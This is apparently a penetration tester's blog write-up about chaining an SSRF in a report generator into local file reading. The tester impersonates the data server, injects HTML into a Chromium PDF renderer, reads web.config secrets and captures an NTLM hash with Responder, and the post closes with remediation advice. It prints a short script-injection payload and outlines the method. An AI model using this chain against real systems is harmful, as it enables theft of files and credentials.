I think every penetration tester has a story about the one that got away. The bug that LOOKED exploitable, but wasn’t. The ones where you’re eating into reporting time, madly trying put something together, and got absolutely nothing for your efforts. SSRF is a neat bug because it jumps trust boundaries. You go from being the user of a web application to someone on the inside, someone who can reach out and touch things on behalf of the vulnerable server. Exploiting SSRF beyond a proof-of-concept callback is often tricky because the impact is largely dependent on the environment you’re making that internal request in.
The classic example of an immediately exploitable SSRF vulnerability is one targeting cloud metadata services to retrieve credentials. This has the added bonus of occasionally turning into a cloud-wide security event as well. But what else can we do to increase the impact of SSRF?
There’s some great service-specific research out there, but this still requires knowledge of those internal endpoints. What if you don’t have a juicy metadata service and you know nothing about their internal network (or it’s out of scope)? This is the story about how I was able to finally use an SSRF technique that had taunted me mercilessly on a previous test to gain LFI on a system.
SSRF-In-The-Middle: Exploring for more
I was testing a reporting application. Users choose the report to run, ensure the preview looks good, and then collect their report in its chosen format from an inbox. The name of the application suggested that it handled reporting for multiple other systems, which would help explain the “bring your own URL” feature. When generating a report, a request is sent with a number of URL parameters that determine where the server should retrieve style information and data prior to generating the report. As you might have guessed, all of these were vulnerable to SSRF.
I chose to inject into the
dataServerUrl parameter since that seemed like it would give me the most flexibility. I caught my initial callback with Collaborator, which gave me the body of the POST request made on my behalf to the report data server:
At this point, we have a medium-severity finding and can helpfully include a link to Mr. Tsai’s aforementioned post to flesh out the potential impact on a client’s environment. But I was on day two of a multi-week test and THIS was my second crack at the one that got away.
The attack I’m about to walk through is a sort of man-in-the-middle attack. Here’s how the legitimate request works:
- User requests a report from
- ServerA requests report data from
ServerAgenerates the report and returns it to the user in their chosen format.
- The user picks up their report from the inbox.
The user doesn’t normally see steps 2 and 3 and, even if they can communicate with
ServerB, they don’t necessarily know the format of the request required to get a response. And even if they knew that they’re still just left with whatever data they were going to eventually receive anyways. That seems boring.
But this is SSRF! We can tell the server where to go. What if we were
ServerB? Then we could inject content into the response and any downstream processing that might happen. This, my friends, is that.
The body of my initial Collaborator callback contained everything I needed to get a response out of my
ServerB. I used the body of the Collaborator request to send a request of my own to the original reporting server specified in the
dataServerUrl parameter. The server helpfully responded with exactly the response the application would need to generate a report.
With the expected response in hand, I created a dummy reporting server using Flask that would serve the data in the expected format to anyone who asked. I re-ran my report, this time injecting the URL for my Flask server. The report ran perfectly and I could now start poking around the downstream reporting server by modifying the relevant parts of the data being served.
The metadata of the generated PDFs showed that Chromium was being used to create the report:
Since Chromium’s PDF generation works on HTML documents (understandably), it meant that my report content was first being rendered as HTML, at which point Chromium would turn it into a PDF before the application finally delivered it to the user.
I like to review my knowledgebase entries on a given technique when working through a test and since we were dealing with SSRF and PDFs, I started with @NahamSec and @daeken’s presentation Owning the Clout Through SSRF and PDF Generators. Unfortunately, none of the techniques outlined there worked, so I shelved it for the time being and moved on.
XX<script>document.write('xx' + window.location)</script>YY
By this point, I’d been banging away at this for a while and decided to take a break for food and sleep. As always, sleep proved useful and my fresh set of eyes unearthed a nice juicy facepalm. There were two report generation options I’d been using to kick off each test iteration. I’d been alternating between the two and had been getting intermittent errors. I went back to square one and realized that I only got errors with option #2.
I retraced my steps using only the working request (hacker level: 1000) and started with an iframe injection:
I was rewarded for my efforts with a beautiful baby iframe:
With a bit of care and feeding, my iframe grew to fill the whole page and I could now peruse the entire hosts file in style:
LFI is much more exciting than SSRF because it can lead to the disclosure of juicy filesystem secrets and often RCE. My next stop was the
web.config file. I traversed up the path discovered by my
window.location injection and got lucky:
machineKey value is especially interesting since it’s used for all sorts of encryption in .NET, including view state (see Machine Key Explained to learn more about it, and Exploiting Deserialisation in ASP.NET via ViewState for how you might gain RCE with a stolen one). In my case, view state was not used so this was not possible. The connection string was also interesting but I didn't find a use for it.
But wait, there’s more! We can read paths from the local filesystem, what about paths from a remote one? I fired up Responder on my evil reporting server and…
Although the hash appears to be for a computer account, this would likely still be sufficient for some limited domain queries, assuming you found a way to relay it to an AD-integrated service. And there you have it. The story of how I caught the one that got away and flipped an otherwise-vanilla SSRF into a much more interesting LFI.
Yes, Mr. Breaker, but how would I stop someone from doing this to my beautiful web application? Ehhh…
I’m kidding, of course I included this section on the first draft of this post! There are a lot of moving parts here. Starting from the first request:
- User-controllable reporting URL.
- No whitelisting on acceptable URL values.
- User-accessible ServerB.
- HTML report generation.
- PDF creation.
Conveniently enough, this is a good prioritized list for remediation:
- Allowing a user to supply the URL is always going to be dangerous, so if you can avoid that, do.
- If you must provide a URL in your request, say, when you’re using the same system to generate reports with data from multiple other servers, as was the case here, then enforce a whitelist of acceptable values (if using regex, remember to define the start and finish of the string to prevent things like
- Next, this attack would not have been possible (or would have been much harder) if I was not able to access the legitimate ServerB to obtain a valid response.
- Rendering a report as HTML certainly allows for a lot of flexibility in report generation; you can design it much as you would any other page and don’t need a third-party product to do so. It perhaps provides too much flexibility. If you have been unable to implement any of the fixes so far, you must treat all of your user input as untrusted. If you’re evaluating HTML tags, define a whitelist of safe tags, and encode the rest.
- Fear not! We still have options even if you must allow all of the dangerous behaviour thus far. The actual impact of this attack was caused by there being something interesting on the local filesystem to embed in my iframe. If the report was being generated in a container or some other intentionally-boring-and-secure option, it would have been far less interesting.
As always, bonus points are awarded for defense in depth. Most of these controls can be implemented with (almost?) no impact on usability and a minor increase in complexity.